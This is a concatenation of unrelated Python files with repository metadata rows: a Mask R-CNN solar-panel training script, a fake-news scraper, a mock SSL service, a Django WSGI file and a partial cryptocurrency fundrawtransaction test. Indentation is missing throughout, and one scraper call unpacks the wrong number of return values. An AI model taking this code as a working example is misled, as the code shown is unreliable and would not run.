python3 balloon.py splash --weights=last --video=<URL or path to file>
"""
import os
import sys
import json
import datetime
import numpy as np
import skimage.draw
#import cv2
#from mrcnn.visualize import display_instances
import matplotlib.pyplot as plt
# Root directory of the project
ROOT_DIR = os.path.abspath("../../")
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn.config import Config
from mrcnn import model as modellib, utils
# Path to trained weights file
COCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5")
# Directory to save logs and model checkpoints, if not provided
# through the command line argument --logs
DEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, "logs")
############################################################
# Configurations
############################################################
class CustomConfig(Config):
"""Configuration for training on the toy dataset.
Derives from the base Config class and overrides some values.
"""
# Give the configuration a recognizable name
NAME = "solar panel"
# We use a GPU with 12GB memory, which can fit two images.
# Adjust down if you use a smaller GPU.
IMAGES_PER_GPU = 2
# Number of classes (including background)
NUM_CLASSES = 1 + 1 # Background + solar panel
# Number of training steps per epoch
STEPS_PER_EPOCH = 100
# Skip detections with < 90% confidence
DETECTION_MIN_CONFIDENCE = 0.9
############################################################
# Dataset
############################################################
class CustomDataset(utils.Dataset):
def load_custom(self, dataset_dir, subset):
"""Load a subset of the Balloon dataset.
dataset_dir: Root directory of the dataset.
subset: Subset to load: train or val
"""
# Add classes. We have only one class to add.
self.add_class("solar panel", 1, "solar panel")
# Train or validation dataset?
assert subset in ["train", "val"]
dataset_dir = os.path.join(dataset_dir, subset)
# Load annotations
# VGG Image Annotator saves each image in the form:
# { 'filename': '28503151_5b5b7ec140_b.jpg',
# 'regions': {
# '0': {
# 'region_attributes': {},
# 'shape_attributes': {
# 'all_points_x': [...],
# 'all_points_y': [...],
# 'name': 'polygon'}},
# ... more regions ...
# },
# 'size': 100202
# }
# We mostly care about the x and y coordinates of each region
annotations = json.load(open(os.path.join(dataset_dir, "via_region_data.json")))
# print(annotations1)
#annotations = list(annotations1.values()) # don't need the dict keys#annotations = annotations1
# The VIA tool saves images in the JSON even if they don't have any
# annotations. Skip unannotated images.
annotations = [a for a in annotations if a['regions']]
# Add images
for a in annotations:
# print(a)
# Get the x, y coordinaets of points of the polygons that make up
# the outline of each object instance. There are stores in the
# shape_attributes (see json format above)
polygons = [r['shape_attributes'] for r in a['regions']]
# load_mask() needs the image size to convert polygons to masks.
# Unfortunately, VIA doesn't include it in JSON, so we must read
# the image. This is only managable since the dataset is tiny.
image_path = os.path.join(dataset_dir, a['filename'])
image = skimage.io.imread(image_path)
height, width = image.shape[:2]
self.add_image(
"solar panel", ## for a single class just add the name here
image_id=a['filename'], # use file name as a unique image id
path=image_path,
width=width, height=height,
polygons=polygons)
def load_mask(self, image_id):
"""Generate instance masks for an image.
Returns:
masks: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance masks.
"""
# If not a balloon dataset image, delegate to parent class.
image_info = self.image_info[image_id]
if image_info["source"] != "solar panel":
return super(self.__class__, self).load_mask(image_id)
# Convert polygons to a bitmap mask of shape
# [height, width, instance_count]
info = self.image_info[image_id]
mask = np.zeros([info["height"], info["width"], len(info["polygons"])],
dtype=np.uint8)
for i, p in enumerate(info["polygons"]):
# Get indexes of pixels inside the polygon and set them to 1
rr, cc = skimage.draw.polygon(p['all_points_y'], p['all_points_x'])
mask[rr, cc, i] = 1
# Return mask, and array of class IDs of each instance. Since we have
# one class ID only, we return an array of 1s
return mask.astype(np.bool), np.ones([mask.shape[-1]], dtype=np.int32)
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "solar panel":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
def train(model):
"""Train the model."""
# Training dataset.
dataset_train = CustomDataset()
dataset_train.load_custom(args.dataset, "train")
dataset_train.prepare()
# Validation dataset
dataset_val = CustomDataset()
dataset_val.load_custom(args.dataset, "val")
dataset_val.prepare()
# *** This training schedule is an example. Update to your needs ***
# Since we're using a very small dataset, and starting from
# COCO trained weights, we don't need to train too long. Also,
# no need to train all layers, just the heads should do it.
print("Training network heads")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE,
epochs=15,
layers='heads')
def color_splash(image, mask):
"""Apply color splash effect.
image: RGB image [height, width, 3]
mask: instance segmentation mask [height, width, instance count]
Returns result image.
"""
# Make a grayscale copy of the image. The grayscale copy still
# has 3 RGB channels, though.
gray = skimage.color.gray2rgb(skimage.color.rgb2gray(image)) * 255
# We're treating all instances as one, so collapse the mask into one layer
mask = (np.sum(mask, -1, keepdims=True) >= 1)
# Copy color pixels from the original color image where mask is set
if mask.shape[0] > 0:
splash = np.where(mask, image, gray).astype(np.uint8)
else:
splash = gray
return splash
def detect_and_color_splash(model, image_path=None, video_path=None):
assert image_path or video_path
# Image or video?
if image_path:
# Run model detection and generate the color splash effect
print("Running on {}".format(args.image))
# Read image
image = skimage.io.imread(args.image)
# Detect objects
r = model.detect([image], verbose=1)[0]
# Color splash
splash = color_splash(image, r['masks'])
# Save output
file_name = "splash_{:%Y%m%dT%H%M%S}.png".format(datetime.datetime.now())
skimage.io.imsave(file_name, splash)
elif video_path:
import cv2
# Video capture
vcapture = cv2.VideoCapture(video_path)
width = int(vcapture.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vcapture.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = vcapture.get(cv2.CAP_PROP_FPS)
# Define codec and create video writer
file_name = "splash_{:%Y%m%dT%H%M%S}.avi".format(datetime.datetime.now())
vwriter = cv2.VideoWriter(file_name,
cv2.VideoWriter_fourcc(*'MJPG'),
fps, (width, height))
count = 0
success = True
while success:
print("frame: ", count)
# Read next image
success, image = vcapture.read()
if success:
# OpenCV returns images as BGR, convert to RGB
image = image[..., ::-1]
# Detect objects
r = model.detect([image], verbose=0)[0]
# Color splash
splash = color_splash(image, r['masks'])
# RGB -> BGR to save image to video
splash = splash[..., ::-1]
# Add image to video writer
vwriter.write(splash)
count += 1
vwriter.release()
print("Saved to ", file_name)
############################################################
# Training
############################################################
if __name__ == '__main__':
import argparse
# Parse command line arguments
parser = argparse.ArgumentParser(
description='Train Mask R-CNN to detect solar panels.')
parser.add_argument("command",
metavar="<command>",
help="'train' or 'splash'")
parser.add_argument('--dataset', required=False,
metavar="/path/to/solar panel/dataset/",
help='Directory of the solar panel dataset')
parser.add_argument('--weights', required=True,
metavar="/path/to/weights.h5",
help="Path to weights .h5 file or 'coco'")
parser.add_argument('--logs', required=False,
default=DEFAULT_LOGS_DIR,
metavar="/path/to/logs/",
help='Logs and checkpoints directory (default=logs/)')
parser.add_argument('--image', required=False,
metavar="path or URL to image",
help='Image to apply the color splash effect on')
parser.add_argument('--video', required=False,
metavar="path or URL to video",
help='Video to apply the color splash effect on')
args = parser.parse_args()
# Validate arguments
if args.command == "train":
assert args.dataset, "Argument --dataset is required for training"
elif args.command == "splash":
assert args.image or args.video,\
"Provide --image or --video to apply color splash"
print("Weights: ", args.weights)
print("Dataset: ", args.dataset)
print("Logs: ", args.logs)
# Configurations
if args.command == "train":
config = CustomConfig()
else:
class InferenceConfig(CustomConfig):
# Set batch size to 1 since we'll be running inference on
# one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU
GPU_COUNT = 1
IMAGES_PER_GPU = 1
config = InferenceConfig()
config.display()
# Create model
if args.command == "train":
model = modellib.MaskRCNN(mode="training", config=config,
model_dir=args.logs)
else:
model = modellib.MaskRCNN(mode="inference", config=config,
model_dir=args.logs)
# Select weights file to load
if args.weights.lower() == "coco":
weights_path = COCO_WEIGHTS_PATH
# Download weights file
if not os.path.exists(weights_path):
utils.download_trained_weights(weights_path)
elif args.weights.lower() == "last":
# Find last trained weights
weights_path = model.find_last()[1]
elif args.weights.lower() == "imagenet":
# Start from ImageNet trained weights
weights_path = model.get_imagenet_weights()
else:
weights_path = args.weights
# Load weights
print("Loading weights ", weights_path)
if args.weights.lower() == "coco":
# Exclude the last layers because they require a matching
# number of classes
model.load_weights(weights_path, by_name=True, exclude=[
"mrcnn_class_logits", "mrcnn_bbox_fc",
"mrcnn_bbox", "mrcnn_mask"])
else:
model.load_weights(weights_path, by_name=True)
# Train or evaluate
if args.command == "train":
train(model)
elif args.command == "splash":
detect_and_color_splash(model, image_path=args.image,
video_path=args.video)
else:
print("'{}' is not recognized. "
"Use 'train' or 'splash'".format(args.command))
| 37.716216 | 105 | 0.590684 |
5e8750b47cb5461d825eb619e99f713cc79bd360 | 4,162 | py | Python | fake_news_classifier/Dashboard/r_news_scrapper.py | keshavgbpecdelhi/FakeNews | 8c1c3a4a83a19b96867111727c5a7df0f6416389 | [
"MIT"
] | 7 | 2020-06-16T17:38:46.000Z | 2022-02-19T12:33:34.000Z | fake_news_classifier/Dashboard/r_news_scrapper.py | keshavgbpecdelhi/FakeNews | 8c1c3a4a83a19b96867111727c5a7df0f6416389 | [
"MIT"
] | null | null | null | fake_news_classifier/Dashboard/r_news_scrapper.py | keshavgbpecdelhi/FakeNews | 8c1c3a4a83a19b96867111727c5a7df0f6416389 | [
"MIT"
] | 5 | 2020-05-08T17:30:46.000Z | 2022-03-26T07:28:04.000Z | from newspaper import Article
import pandas as pd
import numpy as np
import pickle
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import MultinomialNB
import joblib
from sklearn.model_selection import train_test_split
import re
from googlesearch import search
from sklearn.metrics.pairwise import cosine_similarity
from urllib.parse import urlparse
#extractor function that gets the article body from the url
def extractor(url):
article = Article(url)
try:
article.download()
article.parse()
except:
pass
#gets some of the article features like title
article_title = article.title
article = article.text.lower()
article = [article]
return (article, article_title)
#function for the textbox extractor
#it doesn't need an API
def textAreaExtractor(text):
text = text.lower()
text = re.sub(r'[^a-zA-Z0-9\s]', ' ', text)
text = re.sub("(\\r|\r|\n)\\n$", " ", text)
text = [text]
return text
#performs a google search using the article title
def google_search(title, url):
target = url
domain = urlparse(target).hostname
search_title = []
search_urls = []
source_sites = []
#stores the sitenames and the urls into a list
for i in search(title, tld = "com", num = 10, start = 1, stop = 6):
if "youtube" not in i and domain not in i:
source_sites.append(urlparse(i).hostname)
search_urls.append(i)
"""article = Article(i)
try:
article.download()
article.parse()
except:
pass
title = article.title"""
return search_urls, source_sites
def similarity(url_list, article):
article = article
sim_tfv = TfidfVectorizer(stop_words ="english")
#article needs to be vectorized first
sim_transform1 = sim_tfv.fit_transform(article)
cosine = []
cosineCleaned = []
cosineAverage = 0
count = 0
#loop to calculate each article from the google search
#against the original article
for i in url_list:
test_article, test_title = extractor(i)
test_article = [test_article]
sim_transform2 = sim_tfv.transform(test_article[0])
score = cosine_similarity(sim_transform1, sim_transform2)
cosine.append(score*100)
print("Article " + str(count) + " similarity calculated")
count+=1
for i in cosine:
x = str(i).replace('[','').replace(']','')
cosineCleaned.append(x)
for i in cosine:
if i !=0:
cosineAverage = cosineAverage + i
else:
count-=1
#averages the similarity score
averageScore = cosineAverage/count
averageScore = str(averageScore).replace('[','').replace(']','')
averageScore = float(averageScore)
print(averageScore)
return cosineCleaned, averageScore
#classification function
def handlelink(article_link):
#loads the models
job_cv = joblib.load('Dashboard/static/models/cv.pkl')
job_pac = joblib.load('Dashboard/static/models/pac.pkl')
job_vec = joblib.load('Dashboard/static/models/tfv.pkl')
url = (article_link)
#extracts the article and title from the url
article, article_title = extractor(article_link)
#prediction is made
pred = job_pac.predict(job_vec.transform(article))
print("Target article has been classified")
return pred, article_title, article, url
#return article_title, article, url
if __name__ == "__main__":
#gets all the variables needed by executing the functions above
prediction, article_title, article, url = handlelink(article_link='https://techcrunch.com/2020/03/03/smartnews-local-news-feature-now-covers-more-than-6000-u-s-cities/')
#article_title, article, url = handlelink(article_link='https://techcrunch.com/2020/03/03/smartnews-local-news-feature-now-covers-more-than-6000-u-s-cities/')
url_list, search_titles, sitename = google_search(article_title, url)
print(search_titles)
similarity_score, avgScore = similarity(url_list, article)
| 33.837398 | 173 | 0.681643 |
9592e762e9d671c4fe1cbaa0b4c3478a87da94dc | 516 | py | Python | src/bxcommon/test_utils/mocks/mock_node_ssl_service.py | dolphinridercrypto/bxcommon | 8f70557c1dbff785a5dd3fcdf91176066e085c3a | [
"MIT"
] | 12 | 2019-11-06T17:39:10.000Z | 2022-03-01T11:26:19.000Z | src/bxcommon/test_utils/mocks/mock_node_ssl_service.py | dolphinridercrypto/bxcommon | 8f70557c1dbff785a5dd3fcdf91176066e085c3a | [
"MIT"
] | 8 | 2019-11-06T21:31:11.000Z | 2021-06-02T00:46:50.000Z | src/bxcommon/test_utils/mocks/mock_node_ssl_service.py | dolphinridercrypto/bxcommon | 8f70557c1dbff785a5dd3fcdf91176066e085c3a | [
"MIT"
] | 5 | 2019-11-14T18:08:11.000Z | 2022-02-08T09:36:22.000Z | from ssl import SSLContext
from cryptography.x509 import Certificate
from mock import MagicMock
from bxutils.services.node_ssl_service import NodeSSLService
from bxutils.ssl.ssl_certificate_type import SSLCertificateType
class MockNodeSSLService(NodeSSLService):
def blocking_load(self) -> None:
pass
def create_ssl_context(self, cert_type: SSLCertificateType) -> SSLContext:
pass
def get_certificate(self, cert_type: SSLCertificateType) -> Certificate:
return MagicMock()
| 25.8 | 78 | 0.77907 |
71db5ace5696452218f17504d5acdfd123ea8688 | 388 | py | Python | Asang/Asang/wsgi.py | A-Sang/Supermarket | 4d90e6d728d483dd79fd71f3c4b42c3ca938e36e | [
"Apache-2.0"
] | null | null | null | Asang/Asang/wsgi.py | A-Sang/Supermarket | 4d90e6d728d483dd79fd71f3c4b42c3ca938e36e | [
"Apache-2.0"
] | null | null | null | Asang/Asang/wsgi.py | A-Sang/Supermarket | 4d90e6d728d483dd79fd71f3c4b42c3ca938e36e | [
"Apache-2.0"
] | null | null | null | """
WSGI config for Asang project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Asang.settings")
application = get_wsgi_application()
| 22.823529 | 78 | 0.783505 |
45536d06c4ba4cc016e0cd6579a16e5761ee88c7 | 28,404 | py | Python | test/functional/rpc_fundrawtransaction.py | DancingAxolotl/encocoinplus | b3dcc750c48a4f4e2ffebd104e5426544fe2f6b8 | [
"MIT"
] | 1 | 2020-04-07T10:09:00.000Z | 2020-04-07T10:09:00.000Z | test/functional/rpc_fundrawtransaction.py | DancingAxolotl/encocoinplus | b3dcc750c48a4f4e2ffebd104e5426544fe2f6b8 | [
"MIT"
] | 13 | 2020-05-08T11:14:37.000Z | 2020-05-12T10:03:53.000Z | test/functional/rpc_fundrawtransaction.py | DancingAxolotl/encocoinplus | b3dcc750c48a4f4e2ffebd104e5426544fe2f6b8 | [
"MIT"
] | 22 | 2020-02-10T09:17:20.000Z | 2020-07-10T10:33:26.000Z | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
def get_unspent(listunspent, amount):
for utx in listunspent:
if utx['amount'] == amount:
return utx
raise AssertionError('Could not find unspent with amount={}'.format(amount))
class RawTransactionsTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 4
def setup_network(self, split=False):
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
connect_nodes_bi(self.nodes,0,3)
self.is_network_split=False
self.sync_all()
def run_test(self):
print("Mining blocks...")
min_relay_tx_fee = self.nodes[0].getnetworkinfo()['relayfee']
# This test is not meant to test fee estimation and we'd like
# to be sure all txs are sent at a consistent desired feerate
for node in self.nodes:
node.settxfee(min_relay_tx_fee)
# if the fee's positive delta is higher than this value tests will fail,
# neg. delta always fail the tests.
# The size of the signature of every input may be at most 2 bytes larger
# than a minimum sized signature.
# = 2 bytes * minRelayTxFeePerByte
feeTolerance = 2 * min_relay_tx_fee/1000
self.nodes[2].generate(1)
self.sync_all()
self.nodes[0].generate(121)
self.sync_all()
watchonly_address = self.nodes[0].getnewaddress()
watchonly_pubkey = self.nodes[0].validateaddress(watchonly_address)["pubkey"]
watchonly_amount = Decimal(200)
self.nodes[3].importpubkey(watchonly_pubkey, "", True)
watchonly_txid = self.nodes[0].sendtoaddress(watchonly_address, watchonly_amount)
self.nodes[0].sendtoaddress(self.nodes[3].getnewaddress(), watchonly_amount / 10)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.5)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 5.0)
self.nodes[0].generate(1)
self.sync_all()
###############
# simple test #
###############
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(len(dec_tx['vin']) > 0) #test if we have enought inputs
##############################
# simple test with two coins #
##############################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 2.2 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(len(dec_tx['vin']) > 0) #test if we have enough inputs
##############################
# simple test with two coins #
##############################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 2.6 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(len(dec_tx['vin']) > 0)
assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '')
################################
# simple test with two outputs #
################################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 2.6, self.nodes[1].getnewaddress() : 2.5 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
for out in dec_tx['vout']:
totalOut += out['value']
assert(len(dec_tx['vin']) > 0)
assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '')
#########################################################################
# test a fundrawtransaction with a VIN greater than the required amount #
#########################################################################
utx = get_unspent(self.nodes[2].listunspent(), 5)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
for out in dec_tx['vout']:
totalOut += out['value']
assert_equal(fee + totalOut, utx['amount']) #compare vin total and totalout+fee
#####################################################################
# test a fundrawtransaction with which will not get a change output #
#####################################################################
utx = get_unspent(self.nodes[2].listunspent(), 5)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
outputs = { self.nodes[0].getnewaddress() : Decimal(5.0) - fee - feeTolerance }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
for out in dec_tx['vout']:
totalOut += out['value']
assert_equal(rawtxfund['changepos'], -1)
assert_equal(fee + totalOut, utx['amount']) #compare vin total and totalout+fee
####################################################
# test a fundrawtransaction with an invalid option #
####################################################
utx = get_unspent(self.nodes[2].listunspent(), 5)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']} ]
outputs = { self.nodes[0].getnewaddress() : Decimal(4.0) }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
try:
self.nodes[2].fundrawtransaction(rawtx, {'foo': 'bar'})
raise AssertionError("Accepted invalid option foo")
except JSONRPCException as e:
assert("Unexpected key foo" in e.error['message'])
############################################################
# test a fundrawtransaction with an invalid change address #
############################################################
utx = get_unspent(self.nodes[2].listunspent(), 5)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']} ]
outputs = { self.nodes[0].getnewaddress() : Decimal(4.0) }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
try:
self.nodes[2].fundrawtransaction(rawtx, {'changeAddress': 'foobar'})
raise AssertionError("Accepted invalid epgc address")
except JSONRPCException as e:
assert("changeAddress must be a valid epgc address" in e.error['message'])
############################################################
# test a fundrawtransaction with a provided change address #
############################################################
utx = get_unspent(self.nodes[2].listunspent(), 5)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']} ]
outputs = { self.nodes[0].getnewaddress() : Decimal(4.0) }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
change = self.nodes[2].getnewaddress()
try:
rawtxfund = self.nodes[2].fundrawtransaction(rawtx, {'changeAddress': change, 'changePosition': 2})
except JSONRPCException as e:
assert('changePosition out of bounds' == e.error['message'])
else:
assert(False)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx, {'changeAddress': change, 'changePosition': 0})
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
out = dec_tx['vout'][0];
assert_equal(change, out['scriptPubKey']['addresses'][0])
#########################################################################
# test a fundrawtransaction with a VIN smaller than the required amount #
#########################################################################
utx = get_unspent(self.nodes[2].listunspent(), 1)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
# 4-byte version + 1-byte vin count + 36-byte prevout then script_len
rawtx = rawtx[:82] + "0100" + rawtx[84:]
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
matchingOuts = 0
for i, out in enumerate(dec_tx['vout']):
totalOut += out['value']
if out['scriptPubKey']['addresses'][0] in outputs:
matchingOuts+=1
else:
assert_equal(i, rawtxfund['changepos'])
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex'])
assert_equal(matchingOuts, 1)
assert_equal(len(dec_tx['vout']), 2)
###########################################
# test a fundrawtransaction with two VINs #
###########################################
utx = get_unspent(self.nodes[2].listunspent(), 1)
utx2 = get_unspent(self.nodes[2].listunspent(), 5)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ]
outputs = { self.nodes[0].getnewaddress() : 6.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
matchingOuts = 0
for out in dec_tx['vout']:
totalOut += out['value']
if out['scriptPubKey']['addresses'][0] in outputs:
matchingOuts+=1
assert_equal(matchingOuts, 1)
assert_equal(len(dec_tx['vout']), 2)
matchingIns = 0
for vinOut in dec_tx['vin']:
for vinIn in inputs:
if vinIn['txid'] == vinOut['txid']:
matchingIns+=1
assert_equal(matchingIns, 2) #we now must see two vins identical to vins given as params
#########################################################
# test a fundrawtransaction with two VINs and two vOUTs #
#########################################################
utx = get_unspent(self.nodes[2].listunspent(), 1)
utx2 = get_unspent(self.nodes[2].listunspent(), 5)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ]
outputs = { self.nodes[0].getnewaddress() : 6.0, self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
matchingOuts = 0
for out in dec_tx['vout']:
totalOut += out['value']
if out['scriptPubKey']['addresses'][0] in outputs:
matchingOuts+=1
assert_equal(matchingOuts, 2)
assert_equal(len(dec_tx['vout']), 3)
##############################################
# test a fundrawtransaction with invalid vin #
##############################################
listunspent = self.nodes[2].listunspent()
inputs = [ {'txid' : "1c7f966dab21119bac53213a2bc7532bff1fa844c124fd750a7d0b1332440bd1", 'vout' : 0} ] #invalid vin!
outputs = { self.nodes[0].getnewaddress() : 1.0}
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
try:
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
raise AssertionError("Spent more than available")
except JSONRPCException as e:
assert("Insufficient" in e.error['message'])
############################################################
#compare fee of a standard pubkeyhash transaction
inputs = []
outputs = {self.nodes[1].getnewaddress():1.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 1.1)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
#compare fee of a standard pubkeyhash transaction with multiple outputs
inputs = []
outputs = {self.nodes[1].getnewaddress():1.1,self.nodes[1].getnewaddress():1.2,self.nodes[1].getnewaddress():0.1,self.nodes[1].getnewaddress():1.3,self.nodes[1].getnewaddress():0.2,self.nodes[1].getnewaddress():0.3}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendmany("", outputs)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
#compare fee of a 2of2 multisig p2sh transaction
# create 2of2 addr
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[1].getnewaddress()
addr1Obj = self.nodes[1].validateaddress(addr1)
addr2Obj = self.nodes[1].validateaddress(addr2)
mSigObj = self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])
inputs = []
outputs = {mSigObj:1.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendtoaddress(mSigObj, 1.1)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
#compare fee of a standard pubkeyhash transaction
# create 4of5 addr
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[1].getnewaddress()
addr3 = self.nodes[1].getnewaddress()
addr4 = self.nodes[1].getnewaddress()
addr5 = self.nodes[1].getnewaddress()
addr1Obj = self.nodes[1].validateaddress(addr1)
addr2Obj = self.nodes[1].validateaddress(addr2)
addr3Obj = self.nodes[1].validateaddress(addr3)
addr4Obj = self.nodes[1].validateaddress(addr4)
addr5Obj = self.nodes[1].validateaddress(addr5)
mSigObj = self.nodes[1].addmultisigaddress(4, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey'], addr4Obj['pubkey'], addr5Obj['pubkey']])
inputs = []
outputs = {mSigObj:1.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendtoaddress(mSigObj, 1.1)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
# spend a 2of2 multisig transaction over fundraw
# create 2of2 addr
addr1 = self.nodes[2].getnewaddress()
